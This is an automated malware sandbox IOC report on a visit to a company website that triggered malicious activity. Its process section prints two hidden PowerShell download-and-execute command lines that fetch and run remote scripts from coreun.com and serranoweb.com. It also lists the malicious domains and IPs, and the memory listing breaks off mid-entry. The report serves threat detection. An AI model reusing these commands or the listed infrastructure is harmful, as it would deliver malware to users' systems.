IOC Report
https://www.elevate.inc/

loading gif

Files

File Path
Type
Category
Malicious
C:\Users\user\AppData\Local\Temp\x.js
ASCII text
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_adnj0tk3.ac5.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kkqp2qem.1gi.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_odnotogx.3nw.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ynzl3gik.nbm.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KXED81O2BV4LTP4L747E.temp
data
dropped
Chrome Cache Entry: 215
SVG Scalable Vector Graphics image
downloaded
Chrome Cache Entry: 216
JSON data
dropped
Chrome Cache Entry: 217
ISO Media, AVIF Image
downloaded
Chrome Cache Entry: 218
PNG image data, 1388 x 1272, 8-bit colormap, non-interlaced
dropped
Chrome Cache Entry: 219
SVG Scalable Vector Graphics image
downloaded
Chrome Cache Entry: 220
HTML document, Unicode text, UTF-8 text, with very long lines (4813)
downloaded
Chrome Cache Entry: 221
PNG image data, 1059 x 126, 8-bit/color RGBA, interlaced
downloaded
Chrome Cache Entry: 222
ASCII text, with very long lines (4019), with no line terminators
downloaded
Chrome Cache Entry: 223
SVG Scalable Vector Graphics image
dropped
Chrome Cache Entry: 224
ASCII text, with very long lines (6327)
downloaded
Chrome Cache Entry: 225
PNG image data, 360 x 180, 2-bit colormap, non-interlaced
dropped
Chrome Cache Entry: 226
ISO Media, AVIF Image
downloaded
Chrome Cache Entry: 227
PNG image data, 25 x 48, 8-bit/color RGBA, non-interlaced
downloaded
Chrome Cache Entry: 228
ISO Media, AVIF Image
dropped
Chrome Cache Entry: 229
RIFF (little-endian) data, Web/P image
dropped
Chrome Cache Entry: 230
JSON data
downloaded
Chrome Cache Entry: 231
PNG image data, 1388 x 1272, 8-bit colormap, non-interlaced
downloaded
Chrome Cache Entry: 232
Web Open Font Format (Version 2), TrueType, length 48256, version 1.0
downloaded
Chrome Cache Entry: 233
JSON data
downloaded
Chrome Cache Entry: 234
HTML document, Unicode text, UTF-8 text, with very long lines (4639)
downloaded
Chrome Cache Entry: 235
PNG image data, 235 x 34, 8-bit/color RGBA, non-interlaced
dropped
Chrome Cache Entry: 236
Unicode text, UTF-8 text, with very long lines (23237), with no line terminators
downloaded
Chrome Cache Entry: 237
HTML document, Unicode text, UTF-8 text, with very long lines (5738)
downloaded
Chrome Cache Entry: 238
RIFF (little-endian) data, Web/P image
downloaded
Chrome Cache Entry: 239
PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
downloaded
Chrome Cache Entry: 240
ASCII text, with no line terminators
dropped
Chrome Cache Entry: 241
ASCII text, with very long lines (48827)
downloaded
Chrome Cache Entry: 242
HTML document, Unicode text, UTF-8 text, with very long lines (4597)
downloaded
Chrome Cache Entry: 243
SVG Scalable Vector Graphics image
dropped
Chrome Cache Entry: 244
JSON data
downloaded
Chrome Cache Entry: 245
SVG Scalable Vector Graphics image
dropped
Chrome Cache Entry: 246
PNG image data, 2096 x 1590, 8-bit colormap, non-interlaced
dropped
Chrome Cache Entry: 247
PNG image data, 1200 x 600, 1-bit colormap, non-interlaced
dropped
Chrome Cache Entry: 248
ISO Media, AVIF Image
downloaded
Chrome Cache Entry: 249
JSON data
dropped
Chrome Cache Entry: 250
ASCII text, with very long lines (19250)
downloaded
Chrome Cache Entry: 251
ASCII text, with very long lines (48827)
downloaded
Chrome Cache Entry: 252
ASCII text, with very long lines (4898), with no line terminators
downloaded
Chrome Cache Entry: 253
ISO Media, AVIF Image
downloaded
Chrome Cache Entry: 254
ISO Media, AVIF Image
dropped
Chrome Cache Entry: 255
Unicode text, UTF-8 text, with very long lines (65446)
downloaded
Chrome Cache Entry: 256
ISO Media, AVIF Image
dropped
Chrome Cache Entry: 257
HTML document, Unicode text, UTF-8 text
downloaded
Chrome Cache Entry: 258
ASCII text, with very long lines (6079)
downloaded
Chrome Cache Entry: 259
ASCII text, with very long lines (64646)
downloaded
Chrome Cache Entry: 260
ASCII text, with no line terminators
dropped
Chrome Cache Entry: 261
JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 800x450, components 3
dropped
Chrome Cache Entry: 262
SVG Scalable Vector Graphics image
dropped
Chrome Cache Entry: 263
ASCII text, with very long lines (65536), with no line terminators
downloaded
Chrome Cache Entry: 264
ASCII text, with very long lines (46978)
downloaded
Chrome Cache Entry: 265
ASCII text, with very long lines (5359)
downloaded
Chrome Cache Entry: 266
RIFF (little-endian) data, Web/P image
dropped
Chrome Cache Entry: 267
ISO Media, AVIF Image
dropped
Chrome Cache Entry: 268
PNG image data, 1200 x 600, 1-bit colormap, non-interlaced
downloaded
Chrome Cache Entry: 269
SVG Scalable Vector Graphics image
downloaded
Chrome Cache Entry: 270
RIFF (little-endian) data, Web/P image
dropped
Chrome Cache Entry: 271
ISO Media, AVIF Image
dropped
Chrome Cache Entry: 272
PNG image data, 1059 x 126, 8-bit/color RGBA, interlaced
dropped
Chrome Cache Entry: 273
ISO Media, AVIF Image
dropped
Chrome Cache Entry: 274
ASCII text, with very long lines (65311)
downloaded
Chrome Cache Entry: 275
ISO Media, AVIF Image
dropped
Chrome Cache Entry: 276
ISO Media, AVIF Image
downloaded
Chrome Cache Entry: 277
ASCII text, with very long lines (2134)
downloaded
Chrome Cache Entry: 278
ISO Media, AVIF Image
downloaded
Chrome Cache Entry: 279
SVG Scalable Vector Graphics image
downloaded
Chrome Cache Entry: 280
ISO Media, AVIF Image
dropped
Chrome Cache Entry: 281
HTML document, Unicode text, UTF-8 text, with very long lines (4597)
downloaded
Chrome Cache Entry: 282
ASCII text, with very long lines (5359)
downloaded
Chrome Cache Entry: 283
PNG image data, 42 x 45, 8-bit/color RGBA, non-interlaced
downloaded
Chrome Cache Entry: 284
ASCII text, with very long lines (542)
downloaded
Chrome Cache Entry: 285
ASCII text, with very long lines (11723)
downloaded
Chrome Cache Entry: 286
HTML document, Unicode text, UTF-8 text, with very long lines (7101)
downloaded
Chrome Cache Entry: 287
ISO Media, AVIF Image
downloaded
Chrome Cache Entry: 288
ASCII text, with very long lines (8156), with no line terminators
downloaded
Chrome Cache Entry: 289
JSON data
downloaded
Chrome Cache Entry: 290
PNG image data, 1594 x 527, 8-bit/color RGBA, non-interlaced
dropped
Chrome Cache Entry: 291
JSON data
downloaded
Chrome Cache Entry: 292
PNG image data, 360 x 180, 2-bit colormap, non-interlaced
downloaded
Chrome Cache Entry: 293
ASCII text, with no line terminators
downloaded
Chrome Cache Entry: 294
SVG Scalable Vector Graphics image
downloaded
Chrome Cache Entry: 295
ISO Media, AVIF Image
downloaded
Chrome Cache Entry: 296
ISO Media, AVIF Image
downloaded
Chrome Cache Entry: 297
HTML document, ASCII text, with no line terminators
downloaded
Chrome Cache Entry: 298
Unicode text, UTF-8 text, with very long lines (38301)
downloaded
Chrome Cache Entry: 299
ASCII text
downloaded
Chrome Cache Entry: 300
ASCII text, with very long lines (12007)
downloaded
Chrome Cache Entry: 301
JSON data
dropped
Chrome Cache Entry: 302
PNG image data, 25 x 48, 8-bit/color RGBA, non-interlaced
dropped
Chrome Cache Entry: 303
PNG image data, 235 x 34, 8-bit/color RGBA, non-interlaced
downloaded
Chrome Cache Entry: 304
HTML document, Unicode text, UTF-8 text, with very long lines (7440)
downloaded
Chrome Cache Entry: 305
Unicode text, UTF-8 text, with very long lines (65327)
downloaded
Chrome Cache Entry: 306
PNG image data, 36 x 35, 8-bit/color RGBA, non-interlaced
dropped
Chrome Cache Entry: 307
HTML document, Unicode text, UTF-8 text, with very long lines (5082)
downloaded
Chrome Cache Entry: 308
ASCII text, with very long lines (5374)
downloaded
Chrome Cache Entry: 309
HTML document, Unicode text, UTF-8 text, with very long lines (4597)
downloaded
Chrome Cache Entry: 310
HTML document, Unicode text, UTF-8 text, with very long lines (4847)
downloaded
Chrome Cache Entry: 311
ISO Media, AVIF Image
downloaded
Chrome Cache Entry: 312
SVG Scalable Vector Graphics image
dropped
Chrome Cache Entry: 313
ASCII text, with very long lines (2329), with no line terminators
downloaded
Chrome Cache Entry: 314
ISO Media, AVIF Image
downloaded
Chrome Cache Entry: 315
ISO Media, AVIF Image
dropped
Chrome Cache Entry: 316
ASCII text, with very long lines (65451)
downloaded
Chrome Cache Entry: 317
ISO Media, AVIF Image
downloaded
Chrome Cache Entry: 318
ASCII text, with very long lines (1839)
downloaded
Chrome Cache Entry: 319
Unicode text, UTF-8 text, with very long lines (41326)
downloaded
Chrome Cache Entry: 320
HTML document, Unicode text, UTF-8 text, with very long lines (4789)
downloaded
Chrome Cache Entry: 321
JSON data
dropped
Chrome Cache Entry: 322
ASCII text, with very long lines (10082)
downloaded
Chrome Cache Entry: 323
Unicode text, UTF-8 text, with very long lines (65524), with no line terminators
downloaded
Chrome Cache Entry: 324
PNG image data, 2096 x 1590, 8-bit colormap, non-interlaced
downloaded
Chrome Cache Entry: 325
Unicode text, UTF-8 text, with very long lines (14234)
downloaded
Chrome Cache Entry: 326
PNG image data, 2 x 2, 8-bit/color RGBA, non-interlaced
downloaded
Chrome Cache Entry: 327
SVG Scalable Vector Graphics image
downloaded
Chrome Cache Entry: 328
ASCII text, with very long lines (1168)
downloaded
Chrome Cache Entry: 329
ASCII text, with very long lines (6079)
downloaded
Chrome Cache Entry: 330
ASCII text, with very long lines (64943)
downloaded
Chrome Cache Entry: 331
ISO Media, AVIF Image
downloaded
Chrome Cache Entry: 332
HTML document, ASCII text, with no line terminators
downloaded
Chrome Cache Entry: 333
ISO Media, AVIF Image
dropped
Chrome Cache Entry: 334
RIFF (little-endian) data, Web/P image
downloaded
Chrome Cache Entry: 335
ISO Media, AVIF Image
dropped
Chrome Cache Entry: 336
ASCII text, with very long lines (5359)
downloaded
Chrome Cache Entry: 337
ASCII text, with very long lines (65255)
downloaded
Chrome Cache Entry: 338
ASCII text, with no line terminators
dropped
Chrome Cache Entry: 339
ASCII text, with no line terminators
dropped
Chrome Cache Entry: 340
JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 80x45, components 3
dropped
Chrome Cache Entry: 341
ASCII text, with very long lines (5722)
downloaded
Chrome Cache Entry: 342
ASCII text, with no line terminators
dropped
Chrome Cache Entry: 343
PNG image data, 36 x 35, 8-bit/color RGBA, non-interlaced
downloaded
Chrome Cache Entry: 344
HTML document, Unicode text, UTF-8 text, with very long lines (4841)
downloaded
Chrome Cache Entry: 345
HTML document, ASCII text, with very long lines (815)
downloaded
Chrome Cache Entry: 346
Web Open Font Format (Version 2), TrueType, length 105204, version 768.67
downloaded
Chrome Cache Entry: 347
ISO Media, AVIF Image
dropped
Chrome Cache Entry: 348
PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
dropped
Chrome Cache Entry: 349
JSON data
dropped
Chrome Cache Entry: 350
SVG Scalable Vector Graphics image
downloaded
Chrome Cache Entry: 351
ASCII text, with very long lines (4947)
downloaded
Chrome Cache Entry: 352
Unicode text, UTF-8 text, with very long lines (65442), with CRLF line terminators
downloaded
Chrome Cache Entry: 353
ISO Media, AVIF Image
downloaded
Chrome Cache Entry: 354
ASCII text, with very long lines (4038), with no line terminators
downloaded
Chrome Cache Entry: 355
ISO Media, AVIF Image
dropped
Chrome Cache Entry: 356
SVG Scalable Vector Graphics image
dropped
Chrome Cache Entry: 357
HTML document, Unicode text, UTF-8 text, with very long lines (4597)
downloaded
Chrome Cache Entry: 358
PNG image data, 1594 x 527, 8-bit/color RGBA, non-interlaced
downloaded
Chrome Cache Entry: 359
PNG image data, 42 x 45, 8-bit/color RGBA, non-interlaced
dropped
Chrome Cache Entry: 360
ISO Media, AVIF Image
downloaded
Chrome Cache Entry: 361
ASCII text, with very long lines (41429), with no line terminators
downloaded
Chrome Cache Entry: 362
RIFF (little-endian) data, Web/P image
downloaded
Chrome Cache Entry: 363
PNG image data, 2 x 2, 8-bit/color RGBA, non-interlaced
dropped
Chrome Cache Entry: 364
SVG Scalable Vector Graphics image
dropped
There are 149 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ep bypass -w hidden -c "$l='https://coreun.com/wp-content/d5';$p=Join-Path $env:TEMP 'x.js';try{(New-Object Net.WebClient).DownloadFile($l,$p);Start-Process wscript -ArgumentList '//nologo',$p -WindowStyle Hidden}catch{}"
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\system32\wscript.exe" //nologo C:\Users\user\AppData\Local\Temp\x.js
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-Expression (New-Object Net.WebClient).DownloadString('"https://www.serranoweb.com/42/504.txt"')"
malicious
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2012,i,14016717888141100612,18276768270770346762,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=1556 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.elevate.inc/"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

URLs

Name
IP
Malicious
https://www.elevate.inc/
malicious
https://www.serranoweb.com/42/504.txt
161.97.71.23
malicious
https://coreun.com
unknown
malicious
https://player.vimeo.com/api/player.js
162.159.128.61
https://stats.g.doubleclick.net/g/collect
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/659d85daacb0ee65e4fec540_62abedd69e2a1d6
unknown
https://cdn.prod.website-files.com/6537d1496ae55969d9298a91/65aecfb3e0847f76c91dfc6a_icon_automation
unknown
https://reefe.com.au/ab/elevateinc/check/images/all.min.css
167.172.78.216
https://www.elevate.inc/why-elevate
unknown
https://www.google.com/ccm/form-data
unknown
https://js.hs-analytics.net/analytics/1749250500000/19524073.js
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/65b731c45525915bb03e424c_techtrends.avif
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/65b7313d006bab536cc76b2a_cuttime-p-500.a
unknown
https://cdn.mida.so/js/optimize.js?key=w6GQ23b4dMgP1RzEeKpkDq
unknown
https://px.ads.linkedin.com/collect?
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/659d84d8482ac5ec161a86d9_64baf362c1aaca0
unknown
https://www.youtube.com
unknown
https://fontawesome.com
unknown
https://cdn.prod.website-files.com/6537d1496ae55969d9298a91/65937a3a0452f1b9e23ad838_logo12.webp
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/6658deb93c221c91b9b81914_Blog_HSA%20Limi
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/65a1a4d90c6f4fa42a028082_Blog_Lifestyle%
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/65b730d8c78b959ebd7db16b_hierarchy.avif
unknown
https://m.youtube.com
unknown
https://nuget.org/nuget.exe
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/66d8804d98330a06f1ef82a5_659d85dad1c8ab2
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://74.208.195.188:5927
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/65a1a502b2e15d63c792696b_Blog_Meet%20the
unknown
https://github.com/microsoft/clarity
unknown
https://www.google.com/pagead/form-data
unknown
https://www.prnewswire.com/news-releases/elevate-secures-20-million-in-growth-funding-led-by-fin-cap
unknown
https://cdn.prod.website-files.com/6537d1496ae55969d9298a91/658c4784e3cbbca0722a774f_elevate%20webcl
unknown
http://pesterbdd.com/images/Pester.png
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/659b8ebb458eb201f13c4352_64e63bb81dfe526
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://coreun.com/X
unknown
https://www.elevate.inc
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/659d84d7482ac5ec161a85c2_63628f1c59c33f5
unknown
https://contoso.com/Icon
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/65b0328612c05e43c82dd6e2_brian_strom.avi
unknown
https://www.prnewswire.com/news-releases/elevate-named-best-consumer-payments-platform-in-9th-annual
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/65a1a45b0c6f4fa42a021d33_Blog_HSA%202024
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/661e7364df55a3ca5a55b1a6_webinar-p-800.a
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/65a06d73be12b2d532277070_plan%20design.s
unknown
https://www.linkedin.com/in/bstrom/
unknown
https://github.com/Pester/Pester
unknown
https://twitter.com/elevatedotinc
unknown
https://www.elevate.inc/use-cases/benefit-platforms
unknown
https://cdn.prod.website-files.com/6537d1496ae55969d9298a91/css/elevate-redesign.shared.cb8a3df76.mi
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/65a1a448dc0d8cab37812f39_Blog_AI%20or%20
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/67de40df9813cb129fbf4dfb_FinTech_Breakth
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/659b8ebb5c622aebe3793d51_64e63bcefea5157
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/65a06d6ff44cee5e20e97f3d_legacy%20to%20m
unknown
https://github.com/Pester/Pesterh
unknown
https://stats.g.doubleclick.net/g/collect?v=2&
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/65a1a4a6e629ce5250b9f21c_Blog_HSA%20Reve
unknown
https://player.vimeo.com/video/961277965?autoplay=0&muted=1&loop=1&background=0
162.159.128.61
https://www.linkedin.com/company/elevatedotinc
unknown
https://www.prnewswire.com/news-releases/elevate-honored-with-2024-hr-tech-award-for-ai-innovations-
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/65b04547ec6be3ea7121084f_jim_lynch.avif
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/681b920cd2ae6f1cffac8ffd_UX-blog-tmb.png
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/66e9a59f36e67c76ac83a5aa_Award_ebn.avif
unknown
https://techcrunch.com/2021/10/04/elevate-launches-its-approach-to-managing-pre-tax-benefits-with-12
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/65b730c6070493c28afc1d3b_overview.avif
unknown
http://www.hubspot.com
unknown
https://use.typekit.net
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/668818983df6b043c98dbb4b_Screenshot%2020
unknown
https://cdn.prod.website-files.com/6537d1496ae55969d9298a91/65942bd9393c1cc052d8bdfb_form%20header%2
unknown
https://www.google.com/ccm/conversion
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/67bf45c6067d5f46c28dc39e_pr-newswire-log
unknown
https://js.hs-banner.com/v2
unknown
https://www.benefitnews.com/news/elevate-is-making-it-so-that-employees-dont-have-to-choose-between-
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/659d84d7f9942d052cbde9dd_62ab8fff6676244
unknown
https://td.doubleclick.net/td/rul/
unknown
https://www.builtincolorado.com/2021/10/05/elevate-raises-12m-series-a-hsa-fsa-benefits-platform
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/66731b3d77877bc42fd37b96_ClaimsProcess_3
unknown
https://cdn.prod.website-files.com/6537d1496ae55969d9298a91/65b7a3bce315fecbf36ef612_Elevate%20Open%
unknown
https://fontawesome.com/license/free
unknown
http://74.208.195.188:5927/payload(
unknown
https://www.prnewswire.com/news-releases/benefits-platform-elevate-raises-28m-in-growth-funding-3017
unknown
https://www.elevate.inc/blog
unknown
https://js.hscollectedforms.net/collectedforms.js
unknown
https://www.prnewswire.com/news-releases/elevate-lands-more-top-flight-talent-as-several-employee-be
unknown
https://www.prnewswire.com/news-releases/elevate-and-visa-collaborate-on-push-to-debit-health-reimbu
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/66993357317f46bb95f94c3f_DCAP_346x173.av
unknown
http://74.208.195.188:59272
unknown
https://cdn.prod.website-files.com/6537d1496ae55969d9298a91/js/elevate-redesign.schunk.36b8fb4925617
unknown
https://cdn.prod.website-files.com/6537d1496ae55969d9298a91/6830f94bb1339e06239d3298_Screens_2025_v3
unknown
https://www.serranoweb.com/42/504.txtP
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/659d84e639c50a31518316b0_64baf3d6c359f15
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/6601db41b81b36df5da13251_Blog_FSASpiral_
unknown
https://www.linkedin.com/in/cosgray/
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/66e3279237aef04dc35516ef_benefitspro-p-5
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/659d84d8756d3958917d9c6a_61e83a62bf43923
unknown
https://player.vimeo.com/NOTICE.txt
unknown
https://www.elevate.inc/use-cases/third-party-administrators
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/659d84d734ec4c1a87185071_61f964502425d56
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/659d84d64dab0e91b180b0a1_62d9e9960d2a19b
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/661e7870d9a003b80e58428e_claims.png
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/6841eb2c7f3d9f20528f6a15_operations_.png
unknown
http://pesterbdd.com/images/Pester.pngh
unknown
There are 90 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
serranoweb.com
161.97.71.23
malicious
coreun.com
34.175.173.86
malicious
www.serranoweb.com
unknown
malicious
jsdelivr.map.fastly.net
151.101.129.229
forms.hsforms.com
104.18.80.204
user.elevateaccounts.com
18.161.156.81
2captcha.com
104.26.10.235
js.hs-analytics.net
104.17.175.201
proxy-ssl-geo-2.webflow.com
54.243.86.28
api.mida.so
74.235.92.23
vmss-clarity-ingest-eus2-e.eastus2.cloudapp.azure.com
172.175.38.6
track.hubspot.com
104.16.117.116
fresnel.vimeocdn.com
34.120.202.204
forms.hscollectedforms.net
104.16.108.254
js.hs-scripts.com
104.16.139.209
cdnjs.cloudflare.com
104.17.25.14
www.google.com
142.251.116.103
js.hs-banner.com
172.64.147.16
lensflare.vimeo.com
34.120.15.67
arclight.vimeo.com
34.120.202.204
player.vimeo.com.cdn.cloudflare.net
162.159.128.61
c-msn-pme.trafficmanager.net
20.125.209.212
js.hsadspixel.net
104.17.128.172
ax-0001.ax-msedge.net
150.171.28.10
vimeo.com
162.159.128.61
s-part-0029.t-0009.t-msedge.net
13.107.246.57
d3e54v103j8qbb.cloudfront.net
108.138.176.152
vimeo.map.fastly.net
151.101.128.217
www.linkedin.com.cdn.cloudflare.net
104.18.41.41
ln-0002.ln-msedge.net
150.171.22.12
googleads.g.doubleclick.net
142.250.115.157
api.hubapi.com
104.18.242.108
cdn.prod.website-files.com
104.18.161.117
challenges.cloudflare.com
104.18.94.41
reefe.com.au
167.172.78.216
td.doubleclick.net
142.251.186.156
a1916.dscg2.akamai.net
23.205.110.26
js.hscollectedforms.net
104.16.110.254
cdn.jsdelivr.net
unknown
i.vimeocdn.com
unknown
f.vimeocdn.com
unknown
c.clarity.ms
unknown
k.clarity.ms
unknown
www.clarity.ms
unknown
www.linkedin.com
unknown
www.elevate.inc
unknown
px.ads.linkedin.com
unknown
cdn.mida.so
unknown
snap.licdn.com
unknown
player.vimeo.com
unknown
There are 40 hidden domains, click here to show them.

IPs

IP
Domain
Country
Malicious
34.175.173.86
coreun.com
United States
malicious
161.97.71.23
serranoweb.com
United States
malicious
192.168.2.16
unknown
unknown
malicious
172.67.68.114
unknown
United States
104.18.161.117
cdn.prod.website-files.com
United States
104.16.139.209
js.hs-scripts.com
United States
20.125.209.212
c-msn-pme.trafficmanager.net
United States
167.172.78.216
reefe.com.au
United States
142.250.115.103
unknown
United States
108.138.176.152
d3e54v103j8qbb.cloudfront.net
United States
150.171.22.12
ln-0002.ln-msedge.net
United States
104.17.128.172
js.hsadspixel.net
United States
104.18.80.204
forms.hsforms.com
United States
151.101.192.217
unknown
United States
74.208.195.188
unknown
United States
104.18.95.41
unknown
United States
104.17.175.201
js.hs-analytics.net
United States
104.18.242.108
api.hubapi.com
United States
162.159.128.61
player.vimeo.com.cdn.cloudflare.net
United States
54.243.86.28
proxy-ssl-geo-2.webflow.com
United States
104.17.25.14
cdnjs.cloudflare.com
United States
142.251.116.103
www.google.com
United States
142.251.116.147
unknown
United States
151.101.129.229
jsdelivr.map.fastly.net
United States
104.18.94.41
challenges.cloudflare.com
United States
192.168.2.17
unknown
unknown
104.16.110.254
js.hscollectedforms.net
United States
172.64.147.16
js.hs-banner.com
United States
150.171.28.10
ax-0001.ax-msedge.net
United States
151.101.128.217
vimeo.map.fastly.net
United States
104.16.111.254
unknown
United States
142.251.186.156
td.doubleclick.net
United States
18.161.156.81
user.elevateaccounts.com
United States
104.18.41.41
www.linkedin.com.cdn.cloudflare.net
United States
13.107.246.57
s-part-0029.t-0009.t-msedge.net
United States
74.235.92.23
api.mida.so
United States
23.205.110.26
a1916.dscg2.akamai.net
United States
172.175.38.6
vmss-clarity-ingest-eus2-e.eastus2.cloudapp.azure.com
United States
34.120.202.204
fresnel.vimeocdn.com
United States
104.26.10.235
2captcha.com
United States
34.120.15.67
lensflare.vimeo.com
United States
142.250.115.157
googleads.g.doubleclick.net
United States
104.16.117.116
track.hubspot.com
United States
There are 33 hidden IPs, click here to show them.

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PowerShell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PowerShell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PowerShell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PowerShell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PowerShell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PowerShell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PowerShell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PowerShell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PowerShell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PowerShell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PowerShell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PowerShell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PowerShell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PowerShell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
JScriptSetScriptStateStarted
There are 5 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
338AA4F000
stack
page read and write
7FFF7B260000
trusted library allocation
page read and write
7FFF7B2D0000
trusted library allocation
page read and write
27EB566C000
heap
page read and write
3389A76000
stack
page read and write
7FFF7B620000
trusted library allocation
page read and write
7FFF7B0D0000
trusted library allocation
page read and write
7FFF7B290000
trusted library allocation
page read and write
7FFF7B900000
trusted library allocation
page read and write
1916930B000
heap
page read and write
11DB7B30000
heap
page read and write
27EB5520000
heap
page read and write
7FFF7B0C0000
trusted library allocation
page read and write
2171878000
stack
page read and write
7FFF7B763000
trusted library allocation
page read and write
21722CE000
stack
page read and write
7FFF7B280000
trusted library allocation
page read and write
7FFF7B4C0000
trusted library allocation
page read and write
7FFF7B670000
trusted library allocation
page read and write
1CBA6DDF000
trusted library allocation
page read and write
1CBA3730000
heap
page read and write
19160A07000
trusted library allocation
page read and write
1914EEFD000
heap
page read and write
7FFF7B240000
trusted library allocation
page execute and read and write
191691CF000
heap
page read and write
7FFF7B140000
trusted library allocation
page read and write
7FFF7B320000
trusted library allocation
page read and write
7FFF7AE8C000
trusted library allocation
page execute and read and write
7FFF7B230000
trusted library allocation
page read and write
1CBBD641000
heap
page read and write
7FFF7B370000
trusted library allocation
page read and write
33898FE000
stack
page read and write
7FFF7AE47000
